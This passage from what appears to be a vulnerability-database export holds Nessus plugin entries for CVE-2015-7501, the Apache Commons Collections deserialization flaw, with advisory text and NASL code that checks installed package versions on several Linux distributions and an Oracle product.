(rpm_check(release:\"RHEL6\", reference:\"jakarta-commons-collections-tomcat5-3.2.1-5.ep5.el6\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"jakarta-commons-collections / jakarta-commons-collections-tomcat5\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:18:08", "description": "Updated apache-commons-collections packages that fix one security issue are now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe Apache Commons Collections library provides new interfaces, implementations, and utilities to extend the features of the Java Collections Framework.\n\nIt was found that the Apache commons-collections library permitted code execution when deserializing objects involving a specially constructed chain of classes. A remote attacker could use this flaw to execute arbitrary code with the permissions of the application using the commons-collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the commons-collections library is no longer allowed. Applications that require those classes to be deserialized can use the system property 'org.apache.commons.collections.enableUnsafeSerialization' to re-enable their deserialization.\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of apache-commons-collections are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. All running applications using the commons-collections library must be restarted for the update to take effect.", "cvss3": {}, "published": "2015-12-02T00:00:00", "type": "nessus", "title": "CentOS 7 : apache-commons-collections (CESA-2015:2522)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:centos:centos:apache-commons-collections", "p-cpe:/a:centos:centos:apache-commons-collections-javadoc", "p-cpe:/a:centos:centos:apache-commons-collections-testframework", "p-cpe:/a:centos:centos:apache-commons-collections-testframework-javadoc", "cpe:/o:centos:centos:7"], "id": "CENTOS_RHSA-2015-2522.NASL", "href": "https://www.tenable.com/plugins/nessus/87161", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:2522 and \n# CentOS Errata and Security Advisory 2015:2522 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(87161);\n script_version(\"2.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2015-7501\");\n script_xref(name:\"RHSA\", value:\"2015:2522\");\n\n script_name(english:\"CentOS 7 : apache-commons-collections (CESA-2015:2522)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated apache-commons-collections packages that fix one security\nissue are now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe Apache Commons Collections library provides new interfaces,\nimplementations, and utilities to extend the features of the Java\nCollections Framework.\n\nIt was found that the Apache commons-collections library permitted\ncode execution when deserializing objects involving a specially\nconstructed chain of classes. A remote attacker could use this flaw to\nexecute arbitrary code with the permissions of the application using\nthe commons-collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the\ncommons-collections library is no longer allowed. Applications that\nrequire those classes to be deserialized can use the system property\n'org.apache.commons.collections.enableUnsafeSerialization' to\nre-enable their deserialization.\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of apache-commons-collections are advised to upgrade to\nthese updated packages, which contain a backported patch to correct\nthis issue. All running applications using the commons-collections\nlibrary must be restarted for the update to take effect.\"\n );\n # https://lists.centos.org/pipermail/centos-cr-announce/2015-December/002725.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b562fa0b\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apache-commons-collections packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-7501\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:apache-commons-collections\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:apache-commons-collections-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:apache-commons-collections-testframework\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:apache-commons-collections-testframework-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/12/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/02\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 7.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"apache-commons-collections-3.2.1-22.el7_2\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"apache-commons-collections-javadoc-3.2.1-22.el7_2\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"apache-commons-collections-testframework-3.2.1-22.el7_2\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"apache-commons-collections-testframework-javadoc-3.2.1-22.el7_2\")) flag++;\n\n\nif (flag)\n{\n cr_plugin_caveat = '\\n' +\n 'NOTE: The security advisory associated with this vulnerability has a\\n' +\n 'fixed package version that may only be available in the continuous\\n' +\n 'release (CR) repository for CentOS, until it is present in the next\\n' +\n 'point release of CentOS.\\n\\n' +\n\n 'If an equal or higher package level does not exist in the baseline\\n' +\n 'repository for your major version of CentOS, then updates from the CR\\n' +\n 'repository will need to be applied in order to address the\\n' +\n 'vulnerability.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + cr_plugin_caveat\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache-commons-collections / apache-commons-collections-javadoc / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:18:24", "description": "It was found that the Apache commons-collections library permitted code execution when deserializing objects involving a specially constructed chain of classes. A remote attacker could use this flaw to execute arbitrary code with the permissions of the application using the commons-collections library.", "cvss3": {}, "published": "2015-12-15T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : apache-commons-collections (ALAS-2015-618)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501"], "modified": "2018-04-18T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:apache-commons-collections", "p-cpe:/a:amazon:linux:apache-commons-collections-javadoc", "p-cpe:/a:amazon:linux:apache-commons-collections-testframework", "p-cpe:/a:amazon:linux:apache-commons-collections-testframework-javadoc", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2015-618.NASL", "href": "https://www.tenable.com/plugins/nessus/87344", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2015-618.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(87344);\n script_version(\"2.12\");\n script_cvs_date(\"Date: 2018/04/18 15:09:35\");\n\n script_cve_id(\"CVE-2015-7501\");\n script_xref(name:\"ALAS\", value:\"2015-618\");\n\n script_name(english:\"Amazon Linux AMI : apache-commons-collections (ALAS-2015-618)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was found that the Apache commons-collections library permitted\ncode execution when deserializing objects involving a specially\nconstructed chain of classes. A remote attacker could use this flaw to\nexecute arbitrary code with the permissions of the application using\nthe commons-collections library.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2015-618.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update apache-commons-collections' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:apache-commons-collections\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:apache-commons-collections-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:apache-commons-collections-testframework\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:apache-commons-collections-testframework-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/12/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"apache-commons-collections-3.2.1-11.9.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"apache-commons-collections-javadoc-3.2.1-11.9.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"apache-commons-collections-testframework-3.2.1-11.9.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"apache-commons-collections-testframework-javadoc-3.2.1-11.9.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache-commons-collections / apache-commons-collections-javadoc / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:17:43", "description": "It was found that the Apache commons-collections library permitted code execution when deserializing objects involving a specially constructed chain of classes. A remote attacker could use this flaw to execute arbitrary code with the permissions of the application using the commons- collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the commons- collections library is no longer allowed. Applications that require those classes to be deserialized can use the system property 'org.apache.commons.collections.enableUnsafeSerialization' to re-enable their deserialization.\n\nIn the interim, the quickest way to resolve this specific deserialization vulnerability is to remove the vulnerable class files (InvokerTransformer, InstantiateFactory, and InstantiateTransformer) in all commons-collections jar files. Any manual changes should be tested to avoid unforseen complications.\n\nAll running applications using the commons-collections library must be restarted for the update to take effect.", "cvss3": {}, "published": "2015-12-01T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : apache-commons-collections on SL7.x (noarch) (20151130)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:apache-commons-collections", "p-cpe:/a:fermilab:scientific_linux:apache-commons-collections-javadoc", "p-cpe:/a:fermilab:scientific_linux:apache-commons-collections-testframework", "p-cpe:/a:fermilab:scientific_linux:apache-commons-collections-testframework-javadoc", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20151130_APACHE_COMMONS_COLLECTIONS_ON_SL7_X.NASL", "href": "https://www.tenable.com/plugins/nessus/87120", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(87120);\n script_version(\"2.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-7501\");\n\n script_name(english:\"Scientific Linux Security Update : apache-commons-collections on SL7.x (noarch) (20151130)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was found that the Apache commons-collections library permitted\ncode execution when deserializing objects involving a specially\nconstructed chain of classes. A remote attacker could use this flaw to\nexecute arbitrary code with the permissions of the application using\nthe commons- collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the commons-\ncollections library is no longer allowed. Applications that require\nthose classes to be deserialized can use the system property\n'org.apache.commons.collections.enableUnsafeSerialization' to\nre-enable their deserialization.\n\nIn the interim, the quickest way to resolve this specific\ndeserialization vulnerability is to remove the vulnerable class files\n(InvokerTransformer, InstantiateFactory, and InstantiateTransformer)\nin all commons-collections jar files. Any manual changes should be\ntested to avoid unforseen complications.\n\nAll running applications using the commons-collections library must be\nrestarted for the update to take effect.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1511&L=scientific-linux-errata&F=&S=&P=17483\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4e414258\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:apache-commons-collections\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:apache-commons-collections-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:apache-commons-collections-testframework\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:apache-commons-collections-testframework-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/11/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 7.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL7\", reference:\"apache-commons-collections-3.2.1-22.el7_2\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"apache-commons-collections-javadoc-3.2.1-22.el7_2\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"apache-commons-collections-testframework-3.2.1-22.el7_2\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"apache-commons-collections-testframework-javadoc-3.2.1-22.el7_2\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache-commons-collections / apache-commons-collections-javadoc / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:07:11", "description": "The version of Oracle Application Testing Suite installed on the remote host is affected by a remote code execution vulnerability due to unsafe deserialize calls of unauthenticated Java objects to the Apache Commons Collections (ACC) library. An unauthenticated, remote attacker can exploit this, by sending a crafted SOAP request, to execute arbitrary code on the target host.", "cvss3": {}, "published": "2016-05-03T00:00:00", "type": "nessus", "title": "Oracle Application Testing Suite Java Object Deserialization RCE (April 2016 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:oracle:application_testing_suite"], "id": "ORACLE_OATS_CPU_APR_2016.NASL", "href": "https://www.tenable.com/plugins/nessus/90859", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90859);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2015-7501\");\n script_bugtraq_id(78215);\n script_xref(name:\"CERT\", value:\"576313\");\n\n script_name(english:\"Oracle Application Testing Suite Java Object Deserialization RCE (April 2016 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has a web application installed that is affected by a\nremote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle Application Testing Suite installed on the\nremote host is affected by a remote code execution vulnerability due\nto unsafe deserialize calls of unauthenticated Java objects to the\nApache Commons Collections (ACC) library. An unauthenticated, remote\nattacker can exploit this, by sending a crafted SOAP request, to\nexecute arbitrary code on the target host.\");\n # https://www.oracle.com/technetwork/security-advisory/cpuapr2016v3-2985753.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ffb7b96f\");\n # https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9c6d83db\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the April 2016 Oracle\nCritical Patch Update advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-7501\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/04/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:application_testing_suite\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_application_testing_suite_installed.nbin\");\n script_require_keys(\"installed_sw/Oracle Application Testing Suite\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"install_func.inc\");\n\napp_name = \"Oracle Application Testing Suite\";\n\ninstall = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE);\nohome = install[\"Oracle Home\"];\nsubdir = install[\"path\"];\nversion = install[\"version\"];\n\nfix = NULL;\nfix_ver = NULL;\n\n# individual security patches\nif (version =~ \"^12\\.5\\.0\\.2\\.\")\n{\n fix_ver = \"12.5.0.2.605\";\n fix = \"23012288\";\n}\nelse if (version =~ \"^12\\.4\\.0\\.2\\.\")\n{\n fix_ver = \"12.4.0.2.250\";\n fix = \"23012275\";\n}\n\nif (!isnull(fix_ver) && ver_compare(ver:version, fix:fix_ver, strict:FALSE) == -1)\n{\n port = 0;\n if (report_verbosity > 0)\n {\n report =\n '\\n Oracle home : ' + ohome +\n '\\n Install path : ' + subdir +\n '\\n Version : ' + version +\n '\\n Required patch : ' + fix +\n '\\n';\n security_hole(extra:report, port:port);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, subdir);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:18:32", "description": "Updated jakarta-commons-collections packages that fix one security issue are now available for Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe Jakarta/Apache Commons Collections library provides new interfaces, implementations, and utilities to extend the features of the Java Collections Framework.\n\nIt was found that the Apache commons-collections library permitted code execution when deserializing objects involving a specially constructed chain of classes. A remote attacker could use this flaw to execute arbitrary code with the permissions of the application using the commons-collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the commons-collections library is no longer allowed. Applications that require those classes to be deserialized can use the system property 'org.apache.commons.collections.enableUnsafeSerialization' to re-enable their deserialization.\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of jakarta-commons-collections are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. All running applications using the commons-collections library must be restarted for the update to take effect.", "cvss3": {}, "published": "2015-12-22T00:00:00", "type": "nessus", "title": "CentOS 5 : jakarta-commons-collections (CESA-2015:2671)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:centos:centos:jakarta-commons-collections", "p-cpe:/a:centos:centos:jakarta-commons-collections-javadoc", "p-cpe:/a:centos:centos:jakarta-commons-collections-testframework", "p-cpe:/a:centos:centos:jakarta-commons-collections-testframework-javadoc", "p-cpe:/a:centos:centos:jakarta-commons-collections-tomcat5", "cpe:/o:centos:centos:5"], "id": "CENTOS_RHSA-2015-2671.NASL", "href": "https://www.tenable.com/plugins/nessus/87540", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:2671 and \n# CentOS Errata and Security Advisory 2015:2671 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(87540);\n script_version(\"2.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2015-7501\");\n script_xref(name:\"RHSA\", value:\"2015:2671\");\n\n script_name(english:\"CentOS 5 : jakarta-commons-collections (CESA-2015:2671)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated jakarta-commons-collections packages that fix one security\nissue are now available for Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe Jakarta/Apache Commons Collections library provides new\ninterfaces, implementations, and utilities to extend the features of\nthe Java Collections Framework.\n\nIt was found that the Apache commons-collections library permitted\ncode execution when deserializing objects involving a specially\nconstructed chain of classes. A remote attacker could use this flaw to\nexecute arbitrary code with the permissions of the application using\nthe commons-collections library. (CVE-2015-7501)\n\nWith this update, 